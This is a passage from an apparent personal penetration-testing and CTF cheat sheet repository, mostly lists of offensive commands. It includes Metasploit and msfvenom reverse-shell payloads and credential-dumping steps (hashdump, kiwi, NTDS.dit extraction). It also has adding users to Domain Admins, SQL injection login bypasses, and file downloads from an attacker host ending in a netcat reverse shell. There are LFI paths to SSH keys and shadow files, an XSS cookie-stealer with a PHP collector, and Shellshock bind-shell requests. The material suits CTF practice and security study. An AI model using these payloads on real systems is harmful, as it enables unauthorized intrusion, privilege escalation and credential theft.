sheet](https://www.tunnelsup.com/metasploit-cheat-sheet/)) 1443 | 1444 | ### **Windows reverse meterpreter payload** 1445 | 1446 | ```bash 1447 | set payload windows/meterpreter/reverse_tcp 1448 | ``` 1449 | 1450 | - Windows reverse tcp payload 1451 | 1452 | ### **Windows VNC Meterpreter payload** 1453 | 1454 | ```bash 1455 | set payload windows/vncinject/reverse_tcpf 1456 | ``` 1457 | 1458 | - Meterpreter Windows VNC Payload 1459 | 1460 | ```bash 1461 | set ViewOnly false 1462 | ``` 1463 | 1464 | ### **Linux Reverse Meterpreter payload** 1465 | 1466 | ```bash 1467 | set payload linux/meterpreter/reverse_tcp 1468 | ``` 1469 | 1470 | - Meterpreter Linux Reverse Payload 1471 | 1472 | ### **Meterpreter Cheat Sheet** 1473 | 1474 | ```bash 1475 | upload file c:\\windows 1476 | ``` 1477 | 1478 | - Meterpreter upload file to Windows target 1479 | 1480 | ```bash 1481 | download c:\\windows\\repair\\sam /tmp 1482 | ``` 1483 | 1484 | - Meterpreter download file from Windows target 1485 | 1486 | ```bash 1487 | download c:\\windows\\repair\\sam /tmp 1488 | ``` 1489 | 1490 | - Meterpreter download file from Windows target 1491 | 1492 | ```bash 1493 | execute -f c:\\windows\temp\exploit.exe 1494 | ``` 1495 | 1496 | - Meterpreter run .exe on target – handy for executing uploaded exploits 1497 | 1498 | ```bash 1499 | execute -f cmd -c 1500 | ``` 1501 | 1502 | - Creates new channel with cmd shell 1503 | 1504 | ```bash 1505 | ps 1506 | ``` 1507 | 1508 | - Meterpreter show processes 1509 | 1510 | ```bash 1511 | shell 1512 | ``` 1513 | 1514 | - Meterpreter get shell on the target 1515 | 1516 | ```bash 1517 | getsystem 1518 | ``` 1519 | 1520 | - Meterpreter attempts privilege escalation on the target 1521 | 1522 | ```bash 1523 | hashdump 1524 | ``` 1525 | 1526 | - Meterpreter attempts to dump the hashes on the target (must have privileges; try migrating to winlogon.exe if possible first) 1527 | 1528 | ```bash 1529 | portfwd add –l 3389 –p 3389 –r target 1530 | ``` 1531 | 1532 | -
Meterpreter create port forward to target machine 1533 | 1534 | ```bash 1535 | portfwd delete –l 3389 –p 3389 –r target 1536 | ``` 1537 | 1538 | - Meterpreter delete port forward 1539 | 1540 | ```bash 1541 | use exploit/windows/local/bypassuac 1542 | ``` 1543 | 1544 | - Bypass UAC on Windows 7 + Set target + arch, x86/64 1545 | 1546 | ```bash 1547 | use auxiliary/scanner/http/dir_scanner 1548 | ``` 1549 | 1550 | - Metasploit HTTP directory scanner 1551 | 1552 | ```bash 1553 | use auxiliary/scanner/http/jboss_vulnscan 1554 | ``` 1555 | 1556 | - Metasploit JBOSS vulnerability scanner 1557 | 1558 | ```bash 1559 | use auxiliary/scanner/mssql/mssql_login 1560 | ``` 1561 | 1562 | - Metasploit MSSQL Credential Scanner 1563 | 1564 | ```bash 1565 | use auxiliary/scanner/mysql/mysql_version 1566 | ``` 1567 | 1568 | - Metasploit MySQL Version Scanner 1569 | 1570 | ```bash 1571 | use auxiliary/scanner/oracle/oracle_login 1572 | ``` 1573 | 1574 | - Metasploit Oracle Login Module 1575 | 1576 | ```bash 1577 | use exploit/multi/script/web_delivery 1578 | ``` 1579 | 1580 | - Metasploit powershell payload delivery module 1581 | 1582 | ```bash 1583 | post/windows/manage/powershell/exec_powershell 1584 | ``` 1585 | 1586 | - Metasploit upload and run powershell script through a session 1587 | 1588 | ```bash 1589 | use exploit/multi/http/jboss_maindeployer 1590 | ``` 1591 | 1592 | - Metasploit JBOSS deploy 1593 | 1594 | ```bash 1595 | use exploit/windows/mssql/mssql_payload 1596 | ``` 1597 | 1598 | - Metasploit MSSQL payload 1599 | 1600 | ```bash 1601 | run post/windows/gather/win_privs 1602 | ``` 1603 | 1604 | - Metasploit show privileges of current user 1605 | 1606 | ```bash 1607 | use post/windows/gather/credentials/gpp 1608 | ``` 1609 | 1610 | - Metasploit grab GPP saved passwords 1611 | 1612 | ```bash 1613 | load kiwi 1614 | ``` 1615 | 1616 | ```bash 1617 | creds_all 1618 | ``` 1619 | 1620 | - Metasploit load Mimikatz/kiwi and get creds 1621 | 1622 | ```bash 1623 | run
post/windows/gather/local_admin_search_enum 1624 | ``` 1625 | 1626 | - Identify other machines that the supplied domain user has administrative access to 1627 | 1628 | ```bash 1629 | set AUTORUNSCRIPT post/windows/manage/migrate 1630 | ``` 1631 | 1632 | ### **Meterpreter Payloads** 1633 | 1634 | ```bash 1635 | msfvenom –l 1636 | ``` 1637 | 1638 | - List options 1639 | 1640 | ### **Binaries** 1641 | 1642 | ```bash 1643 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf 1644 | ``` 1645 | 1646 | ```bash 1647 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe 1648 | ``` 1649 | 1650 | ```bash 1651 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho 1652 | ``` 1653 | 1654 | ### **Web Payloads** 1655 | 1656 | ```bash 1657 | msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php 1658 | ``` 1659 | 1660 | - PHP 1661 | 1662 | ```bash 1663 | set payload php/meterpreter/reverse_tcp 1664 | ``` 1665 | 1666 | - Listener 1667 | 1668 | ```bash 1669 | cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php 1670 | ``` 1671 | 1672 | - PHP 1673 | 1674 | ```bash 1675 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 1676 | ``` 1677 | 1678 | - ASP 1679 | 1680 | ```bash 1681 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 1682 | ``` 1683 | 1684 | - JSP 1685 | 1686 | ```bash 1687 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 1688 | ``` 1689 | 1690 | - WAR 1691 | 1692 | ### **Scripting Payloads** 1693 | 1694 | ```bash 1695 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py 1696 | ``` 1697 | 1698 | - Python 1699 | 1700 | ```bash 1701 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh 1702 | ``` 1703 | 1704 | - Bash 1705 | 1706 | ```bash 1707 | msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 1708 | ``` 1709 | 1710 | - Perl 1711 | 1712 | ###
**Shellcode** 1713 | 1714 | For all shellcode see ‘msfvenom –help-formats’ for information as to 1715 | valid parameters. Msfvenom will output code that is able to be cut and 1716 | pasted in this language for your exploits. 1717 | 1718 | ```bash 1719 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 1720 | ``` 1721 | 1722 | ```bash 1723 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 1724 | ``` 1725 | 1726 | ```bash 1727 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 1728 | ``` 1729 | 1730 | ### **Handlers** 1731 | 1732 | Metasploit handlers can be great at quickly setting up Metasploit to 1733 | be in a position to receive your incoming shells. Handlers should be in 1734 | the following format. 1735 | 1736 | ``` 1737 | exploit/multi/handler set PAYLOAD set LHOST set LPORT set ExitOnSession false exploit -j -z 1738 | ``` 1739 | 1740 | An example is: 1741 | 1742 | ``` 1743 | msfvenom exploit/multi/handler -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f > exploit.extension 1744 | ``` 1745 | 1746 | # **Powershell** 1747 | 1748 | **Execution Bypass** 1749 | 1750 | ```bash 1751 | Set-ExecutionPolicy Unrestricted 1752 | ./file.ps1 1753 | ``` 1754 | 1755 | ```bash 1756 | Import-Module script.psm1 1757 | Invoke-FunctionThatIsIntheModule 1758 | ``` 1759 | 1760 | ```bash 1761 | iex(new-object system.net.webclient).downloadstring(“file:///C:\examplefile.ps1”) 1762 | ``` 1763 | 1764 | **Powershell.exe blocked** 1765 | 1766 | ```bash 1767 | Use ‘not powershell’ [https://github.com/Ben0xA/nps](https://github.com/Ben0xA/nps) 1768 | ``` 1769 | 1770 | **Persistence** 1771 | 1772 | ```bash 1773 | net user username "password" /ADD 1774 | ``` 1775 | 1776 | ```bash 1777 | net group "Domain Admins" %username% /DOMAIN /ADD 1778 | ``` 1779 | 1780 | **Gather NTDS.dit file** 1781 | 1782 | ```bash 1783 | ntdsutil 1784 | ``` 1785 | 1786 | ```bash 1787 | activate instance ntds 1788 | ``` 1789 | 1790 | ```bash 1791 | ifm 1792 | ``` 1793 | 1794 | 
```bash 1795 | create full C:\ntdsutil 1796 | ``` 1797 | 1798 | ```bash 1799 | quit 1800 | ``` 1801 | 1802 | ```bash 1803 | quit 1804 | ``` 1805 | 1806 | # **SQLInjections** 1807 | 1808 | ### Common **Injections for Login Forms:** 1809 | 1810 | ```bash 1811 | admin' -- 1812 | ``` 1813 | 1814 | ```bash 1815 | admin' # 1816 | ``` 1817 | 1818 | ```bash 1819 | admin'/* 1820 | ``` 1821 | 1822 | ```bash 1823 | ' or 1=1-- 1824 | ``` 1825 | 1826 | ```bash 1827 | ' or 1=1# 1828 | ``` 1829 | 1830 | ```bash 1831 | ' or 1=1/* 1832 | ``` 1833 | 1834 | ```bash 1835 | ') or '1'='1-- 1836 | ``` 1837 | 1838 | ```bash 1839 | ') or ('1'='1— 1840 | ``` 1841 | 1842 | ## Uploading Files to Target Machine 1843 | 1844 | TFTP 1845 | 1846 | ```bash 1847 | #TFTP Linux: cat /etc/default/atftpd to find out file serving location; default in kali /srv/tftp 1848 | service atftpd start 1849 | 1850 | # Windows 1851 | tftp -i $ATTACKER get /download/location/file /save/location/file 1852 | ``` 1853 | 1854 | FTP 1855 | 1856 | ```bash 1857 | # Linux: set up ftp server with anonymous logon access; 1858 | twistd -n ftp -p 21 -r /file/to/serve 1859 | 1860 | # Windows shell: read FTP commands from ftp-commands.txt non-interactively; 1861 | echo open $ATTACKER>ftp-commands.txt 1862 | echo anonymous>>ftp-commands.txt 1863 | echo whatever>>ftp-commands.txt 1864 | echo binary>>ftp-commands.txt 1865 | echo get file.exe>>ftp-commands.txt 1866 | echo bye>>ftp-commands.txt 1867 | ftp -s:ftp-commands.txt 1868 | 1869 | # Or just a one-liner 1870 | (echo open 10.11.0.245&echo anonymous&echo whatever&echo binary&echo get nc.exe&echo bye) > ftp.txt & ftp -s:ftp.txt & nc.exe 10.11.0.245 443 -e cmd 1871 | ``` 1872 | 1873 | CertUtil (download file from windows) 1874 | 1875 | ```bash 1876 | certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe 1877 | me 1878 | ``` 1879 | 1880 | PHP 1881 | 1882 | ```bash 1883 | 1884 | ``` 1885 | 1886 | Python 1887 | 1888 | ```bash 1889 | python -c "from urllib import urlretrieve; 
urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')" 1890 | ``` 1891 | 1892 | HTTP: Powershell 1893 | 1894 | ```bash 1895 | python -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')" 1896 | ``` 1897 | 1898 | HTTP: Linux 1899 | 1900 | ```bash 1901 | wget http://$ATTACKER/file 1902 | curl http://$ATTACKER/file -O 1903 | scp ~/file/file.bin user@$TARGET:tmp/backdoor.py 1904 | ``` 1905 | 1906 | NetCat 1907 | 1908 | ```bash 1909 | # Attacker 1910 | nc -l -p 4444 < /tool/file.exe 1911 | 1912 | # Victim 1913 | nc $ATTACKER 4444 > file.exe 1914 | ``` 1915 | 1916 | # Web Application 1917 | 1918 | ## LFI (Local File Inclusion) 1919 | 1920 | if we found an LFI, we can check each of those paths, 1921 | 1922 | we can use burpsuite intruder to see all 1923 | Useful LFI files 1924 | Linux 1925 | /etc/passwd 1926 | /etc/shadow 1927 | /etc/issue 1928 | /etc/group 1929 | /etc/hostname 1930 | /etc/ssh/ssh_config 1931 | /etc/ssh/sshd_config 1932 | /root/.ssh/id_rsa 1933 | /root/.ssh/authorized_keys 1934 | /home/user/.ssh/authorized_keys 1935 | /home/user/.ssh/id_rsa 1936 | /proc/[0-9]*/fd/[0-9]* 1937 | /proc/mounts 1938 | /home/$USER/.bash_history 1939 | /home/$USER/.ssh/id_rsa 1940 | /var/run/secrets/kubernetes.io/serviceaccount 1941 | /var/lib/mlocate/mlocate.db 1942 | /var/lib/mlocate.db 1943 | Apache 1944 | /etc/apache2/apache2.conf 1945 | /usr/local/etc/apache2/httpd.conf 1946 | /etc/httpd/conf/httpd.conf 1947 | Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log 1948 | Debian/Ubuntu -> /var/log/apache2/access.log 1949 | FreeBSD -> /var/log/httpd-access.log 1950 | /var/log/apache/access.log 1951 | /var/log/apache/error.log 1952 | /var/log/apache2/access.log 1953 | /var/log/apache/error.log 1954 | MySQL 1955 | /var/lib/mysql/mysql/user.frm 1956 | /var/lib/mysql/mysql/user.MYD 1957 | /var/lib/mysql/mysql/user.MYI 1958 | Windows 1959 | /boot.ini 1960 | /autoexec.bat 1961 | /windows/system32/drivers/etc/hosts 1962 | 
/windows/repair/SAM 1963 | /windows/panther/unattended.xml 1964 | /windows/panther/unattend/unattended.xml 1965 | /windows/system32/license.rtf 1966 | /windows/system32/eula.txt 1967 | 1968 | Situation 1969 | 1970 | ``` 1971 | http:///index.php?parameter=value 1972 | 1973 | ``` 1974 | 1975 | ### How to Test 1976 | 1977 | ``` 1978 | http:///index.php?parameter=php://filter/convert.base64-encode/resource=index 1979 | 1980 | ``` 1981 | 1982 | ``` 1983 | http:///script.php?page=../../../../../../../../etc/passwd 1984 | OR 1985 | http:///script.php?page=..//..//..//..//..//..//../etc/passwd 1986 | OR 1987 | curl http:///script.php?page=..//..//..//..//..//..//../etc/passwd 1988 | 1989 | ``` 1990 | 1991 | ``` 1992 | http:///script.php?page=../../../../../../../../boot.ini 1993 | 1994 | ``` 1995 | 1996 | ### LFI Payloads 1997 | 1998 | - [Payload All the Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion/Intruders) 1999 | - [Seclist LFI Intruder](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI) 2000 | 2001 | ## XSS 2002 | 2003 | ### Reflected 2004 | 2005 | ### Simple test 2006 | 2007 | This is a simple test to see what happens, this is not a prove that the field is vuln to xss 2008 | 2009 | 2010 | 2011 | ### Simple XSS test 2012 | 2013 | <script>alert('Found')</script> 2014 | 2015 | "><script>alert(Found)</script>"> 2016 | 2017 | <script>alert(String.fromCharCode(88,83,83))</script> 2018 | 2019 | ### Bypass filter of tag script 2020 | 2021 | `" onload="alert(String.fromCharCode(88,83,83))` 2022 | 2023 | " onload="alert('XSS') 2024 | 2025 | bla is not a valid image, so this cause an error 2026 | 2027 | <img src='bla' onerror=alert("XSS")> 2028 | 2029 | ### Persistent 2030 | 2031 | >document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>HACKED!</h1></div>"; 2032 | 2033 | ### PHP collector 2034 | 2035 | `> cookie.txtchmod 777 cookie.txt` 2036 | 2037 | edit a php page like 
colector.php as follow: 2038 | 2039 | <?php $cookie=GET['cookie']; $useragent=$_SERVER['HTTP_USER_AGENT']; $file=fopen('cookie.txt', 'a'); fwrite($file,"USER AGENT:$useragent || COOKIE=$cookie\n"); fclose($file); 2040 | ?> 2041 | 2042 | Script to put in page: 2043 | 2044 | <scritp>new Image().src="http://OUR_SERVER_IP/colector.php?cookie="+document.cookie;</script> 2045 | 2046 | ### Malware Donwloader via XSS 2047 | 2048 | <iframe src="http://OUR_SERVER_IP/OUR_MALWARE" height="0" width="0"></iframe> 2049 | 2050 | ### How to play Mario with XSS 2051 | 2052 | <iframe src="https://jcw87.github.io/c2-smb1/" width="100%" height="600"></iframe> 2053 | 2054 | <input onfocus="document.body.innerHTML=atob('PGlmcmFtZSBzcmM9Imh0dHBzOi8vamN3ODcuZ2l0aHViLmlvL2MyLXNtYjEvIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSI2MDAiPjwvaWZyYW1lPg==')" autofocus> 2055 | 2056 | ### XSS payloads 2057 | 2058 | - [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection) 2059 | - [Seclist XSS](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/XSS) 2060 | 2061 | ## MySql Cheat Sheet 2062 | 2063 | ```bash 2064 | mysql -u [username] -p; #connect, you will be asked for password 2065 | SHOW DATABASES; 2066 | use DB_NAME; 2067 | SHOW TABLES; 2068 | select * from TABLE; 2069 | ``` 2070 | 2071 | [MySQL cheatsheet](https://devhints.io/mysql) 2072 | 2073 | [MySQL Cheat Sheet](https://www.mysqltutorial.org/mysql-cheat-sheet.aspx) 2074 | 2075 | # Misc 2076 | 2077 | ## Linux file permissions 2078 | 2079 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%202.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%202.png) 2080 | 2081 | ## Linux Cheat Sheet 2082 | 2083 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%203.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%203.png) 2084 | 2085 | 
[The Concise Blue Team Cheat Sheets](https://itblogr.com/wp-content/uploads/2020/04/The-Concise-Blue-Team-cheat-Sheets.pdf?fbclid=IwAR2lG6uxX3cMwu4G80Vwl_ZxpddwEPDqsyXb27yw5xjMOnAB1zX9ZEjDl78)
2104 | 2105 | ```bash 2106 | python -m SimpleHTTPServer 80 2107 | python3 -m http.server 2108 | python -m pyftpdlib -p 21 #start a local ftp server with anonymous:anonymouscer 2109 | 2110 | updog 2111 | 2112 | ruby -rwebrick -e "WEBrick::HTTPServer.new 2113 | (:Port => 80, :DocumentRoot => Dir.pwd).start" 2114 | 2115 | php -S 0.0.0.0:80 2116 | ``` 2117 | 2118 | ## Hash Examples 2119 | 2120 | Likely just use **hash-identifier** for this but here are some example hashes: 2121 | 2122 | [Untitled](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%20Database%202c8912d8c7b747859491d93a41439662.csv) 2123 | 2124 | # Text Manipulation 2125 | 2126 | ## [awk](https://www.howtogeek.com/562941/how-to-use-the-awk-command-on-linux/) - command-line text manipulation dynamo 2127 | 2128 | ```bash 2129 | awk -F: '{print $1,$6}' /etc/passwd 2130 | $0: Represents the entire line of text. 2131 | $1: Represents the first field. 2132 | $2: Represents the second field. 2133 | $7: Represents the seventh field. 2134 | $45: Represents the 45th field. 2135 | $NF: Stands for “number of fields,” and represents the last field. 
2136 | -F (separator string) 2137 | ``` 2138 | 2139 | ### Sublime Text Editor 2140 | 2141 | ```jsx 2142 | Splitting the Selection into Lines 2143 | 2144 | Select a block of lines, and then split it into many selections, one per line, using: 2145 | 2146 | Windows/Linux: Ctrl+Shift+L 2147 | ``` 2148 | 2149 | ### sed cheat sheet 2150 | 2151 | ![https://s3.studylib.net/store/data/008266685_1-65c7d170c2600d5fd58feafc3611414f.png](https://s3.studylib.net/store/data/008266685_1-65c7d170c2600d5fd58feafc3611414f.png) 2152 | 2153 | ## Useful links 2154 | 2155 | [A cheat-sheet for password crackers](https://www.unix-ninja.com/p/A_cheat-sheet_for_password_crackers) 2156 | 2157 | [Penetration testing and webapp cheat sheets](https://doxsec.wordpress.com/2017/07/21/penetration-testing-and-webapp-cheat-sheets/) 2158 | 2159 | [The Ultimate List of SANS Cheat Sheets](https://www.sans.org/blog/the-ultimate-list-of-sans-cheat-sheets/?utm_medium=Social&utm_source=Twitter&utm_content=EMEA&utm_campaign=Security%20Trends%20Blog) 2160 | 2161 | [](https://www.sans.org/security-resources/posters/blueprint-building-pen-tester/160/download) 2162 | 2163 | [](https://www.sans.org/security-resources/posters/pen-test-pivots-payloads/180/download) 2164 | 2165 | [coreb1t/awesome-pentest-cheat-sheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) 2166 | 2167 | [Penetrating Testing/Assessment Workflow](https://gist.github.com/jivoi/724e4b4b22501b77ef133edc63eba7b4) 2168 | 2169 | [0DAYsecurity.com - The fastest resource to a proactive security](http://www.0daysecurity.com/pentest.html) 2170 | 2171 | [OSCP Ultimate CheatSheet - ByteFellow](https://www.bytefellow.com/oscp-ultimate-cheatsheet/) 2172 | 2173 | [Linux Privilege Escalation CheatSheet for OSCP - ByteFellow](https://www.bytefellow.com/linux-privilege-escalation-cheatsheet-for-oscp/) 2174 | 2175 | [Windows Privilege Escalation Cheatsheet for OSCP - 
ByteFellow](https://www.bytefellow.com/windows-privilege-escalation-cheatsheet-for-oscp/) 2176 | 2177 | [Cheat Sheet](https://jok3rsecurity.com/cheat-sheet/) 2178 | 2179 | [CountablyInfinite/oscp_cheatsheet](https://github.com/CountablyInfinite/oscp_cheatsheet) 2180 | 2181 | [OSCP: Developing a Methodology](https://falconspy.medium.com/oscp-developing-a-methodology-32f4ab471fd6) 2182 | 2183 | [Passing OSCP](https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html) 2184 | 2185 | [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) 2186 | 2187 | [](https://storage.googleapis.com/vkmedia-wp-blogg-vk/uploads/uploads/sites/710/2013/08/Linux-101-Hacks.pdf) 2188 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hacking-and-CTF-Cheat-Sheet 2 | 3 | This is my collection of Commands and Syntax for all utils i use when trying to hack CTF's challanges. 
4 | 5 | Enjoy 6 | @hasamba 7 | 8 | # Hacking Cheat Sheet 9 | 10 | # Reconnaissance (Information Gathering) 11 | 12 | - [hunter.io](https://hunter.io/) - known email and users for a specific domain 13 | - theharvester - search for emails in several search engines 14 | 15 | ```bash 16 | theHarvester -d *.co.il -l 500 -b google 17 | ``` 18 | 19 | - sublist3r - search for subdomain for a given domain 20 | - [crt.sh](http://crt.sh) - subdomains search with %.tesla.co.il 21 | - [httprobe](https://github.com/tomnomnom/httprobe) - will check a list of domain if they are alive, we can fire it sublis3r results 22 | - [amass](https://github.com/OWASP/Amass) - can also search for subdomains and more 23 | 24 | ```bash 25 | amass enum -d tesla.com 26 | ``` 27 | 28 | - [builtwith](https://builtwith.com/) - show frameworks and technologies any domain is built with, then we can search for exploits for those technologies 29 | - [wappalizer](https://www.wappalyzer.com/download/) - browser addon that does almost the same as builtwith 30 | - whatweb - same but uglier than builtwith 31 | - [sumrecon](https://github.com/Gr1mmie/sumrecon) - script that automate some of the above 32 | - [shodan.io](http://shodan.io) - find open ports and services online 33 | - [dnsdumpster](https://dnsdumpster.com/) - dns recon & research, find & lookup dns records 34 | - [ipinfo.io](http://ipinfo.io) - ip info 35 | - [dehashed](https://www.dehashed.com) - find leaked emails and passwords 36 | - simplyemail - enumerate all the online places (github, target site etc) 37 | 38 | ``` 39 | git clone https://github.com/killswitch-GUI/SimplyEmail.git 40 | ./SimplyEmail.py -all -e TARGET-DOMAIN 41 | ``` 42 | 43 | - DNSRecon - DNS Bruteforce 44 | 45 | ```bash 46 | dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml 47 | ``` 48 | 49 | - Skipfish - prepares an interactive sitemap for the targeted site 50 | 51 | ```bash 52 | # basic scan 53 | skipfish -o out_dir https://www.host.com 54 | # 
using cookies to access authenticated pages 55 | skipfish -o out_dir -I urls_to_scan -X urls_not_to_scan -C cookie1=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX -C cookie2=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX https://www.host.com 56 | ``` 57 | 58 | - [namechk](https://namechk.com/) / [whatsmyname](https://whatsmyname.app/) / [namecheckup](https://namecheckup.com/) - OSINT use accounts around the web 59 | - [maltego](https://sectools.org/tool/maltego/) - data mining application 60 | 61 | - Exploiting Shellshock 62 | 63 | ```bash 64 | git clone https://github.com/nccgroup/shocker 65 | ``` 66 | 67 | ```bash 68 | ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose 69 | ``` 70 | 71 | cat file (view file contents) 72 | 73 | ```bash 74 | echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80 75 | ``` 76 | 77 | Shell Shock run bind shell 78 | 79 | ```bash 80 | echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80 81 | ``` 82 | 83 | Shell Shock reverse Shell 84 | 85 | ```bash 86 | nc -l -p 443 87 | ``` 88 | 89 | # Scanning 90 | 91 | - arp-scan (Kali) - gives all IP's on NAT 92 | - netdiscover (Kali) - show live IP's 93 | 94 | ```bash 95 | sudo netdiscover -r 10.0.0.0/24 96 | ``` 97 | 98 | - [rustscan](https://github.com/RustScan/RustScan#-usage) - Scans all 65k ports in 3 seconds and pipe them to NMAP 99 | 100 | ```bash 101 | rustscan -a 127.0.0.1 -- -A -sC 102 | #it's like running nmap -Pn -vvv -p $PORTS -A -sC 127.0.0.1 103 | ``` 104 | 105 | - nmap 106 | 107 | ```bash 108 | nmap -T4 -p- -A 192.168.249.128 109 | nmap -sV -sC -O FILENAME IP 110 | nmap -sU -sV --script=vuln #search vulnarabilities 111 | #T4: speed 1-5, prefered 4, 112 | #-p-: scan all 65K ports, 113 | #-A: all information possible, 114 | #-sS: stealth mode is running by default, it means 
that we do not establish a connection, instead after ACK we send a reset (SYN→SYNACK→RST) 115 | #-sV: find versions 116 | #-sc: default script 117 | #-O: output to file 118 | ls /usr/share/nmap/scripts/* | grep ftp #Search nmap scripts for keywords 119 | 120 | #clean results 121 | grep '/tcp' FILENAME | awk -F "/" '{print $1}'| tr '\n' ',';echo 122 | ``` 123 | 124 | - masscan (kali): another fast port scanner 125 | 126 | ```bash 127 | masscan -p1-65535 --rate 1000 10.0.0.101 128 | ``` 129 | 130 | - metasloit - auxiliary in msf is extra enumration and recon 131 | 132 | ```bash 133 | use auxiliary/scanner/smb/smb_version 134 | ``` 135 | 136 | - searchsploit (kali) - search exploit-db website offline 137 | 138 | ```bash 139 | searchsploit mod ssl 2 140 | ``` 141 | 142 | - [Nessus](https://www.tenable.com/products/nessus) - vulnerability assessment, it can scan for open ports, open vulnerabilities, directory busting 143 | - openvas - Vulnerability Assessment 144 | 145 | ```bash 146 | apt-get update 147 | apt-get dist-upgrade -y 148 | apt-get install openvas 149 | openvas-setup 150 | netstat -tulpn #Verify openvas is running using 151 | #Login at https://127.0.0.1:9392 - credentials are generated during openvas-setup 152 | 153 | ``` 154 | 155 | ## AIO Scanners 156 | 157 | - [nmap automator](https://github.com/21y4d/nmapAutomator) - A script that you can run in the background! 
158 | 159 | ```bash 160 | ./nmapAutomator.sh <TARGET-IP> <TYPE> 161 | ./nmapAutomator.sh 10.1.1.1 All 162 | ./nmapAutomator.sh 10.1.1.1 Basic 163 | ./nmapAutomator.sh 10.1.1.1 Recon 164 | ``` 165 | 166 | - [autorecon](https://github.com/Tib3rius/AutoRecon) - multi-threaded network reconnaissance tool which performs automated enumeration of services 167 | 168 | ```bash 169 | autorecon 127.0.0.1 170 | 171 | ``` 172 | 173 | - [Vanquish](https://github.com/frizb/Vanquish) - AIO tool (NMap | Hydra | Nikto | Metasploit | | Gobuster | Dirb | Exploitdb | Nbtscan | | Ntpq | Enum4linux | Smbclient | Rpcclient | | Onesixtyone | Sslscan | Sslyze | Snmpwalk | | Ident-user-enum | Smtp-user-enum | Snmp-check | Cisco-torch | | Dnsrecon | Dig | Whatweb | Wafw00f | | Wpscan | Cewl | Curl | Mysql | Nmblookup | Searchsploit | | Nbtscan-unixwiz | Xprobe2 | Blindelephant | Showmount) 174 | 175 | ```bash 176 | echo "[IP]" > ~/tools/vanquish/hosts.txt 177 | python2 Vanquish2.py -hostFile hosts.txt -logging -outputFolder ~/hackthebox/[BOXNAME] 178 | 179 | ``` 180 | 181 | - [hackerEnv](https://github.com/abdulr7mann/hackerEnv) - automation tool that quickly and easily sweep IPs and scan ports, vulnerabilities and exploit them 182 | 183 | ```bash 184 | ./hackerEnv -t 10.10.10.10 185 | ``` 186 | 187 | - [fsociety](https://github.com/Manisso/fsociety) - A Penetration Testing Framework, you will have every script that a hacker needs 188 | 189 | - recon-ag - full-featured web reconnaissance framework written in Python 190 | 191 | ```bash 192 | git clone https://github.com/lanmaster53/recon-ng.gitcd /recon-ng 193 | ./recon-ng 194 | show modules 195 | help 196 | ``` 197 | 198 | - [autorecon](https://github.com/Tib3rius/AutoRecon) - multi-threaded network reconnaissance tool which performs automated enumeration of services 199 | 200 | ```bash 201 | autorecon 127.0.0.1 202 | ``` 203 | 204 | - [legion](https://github.com/carlospolop/legion) - Automatic Enumeration Tool 205 | 206 | ```jsx 207 | sudo 
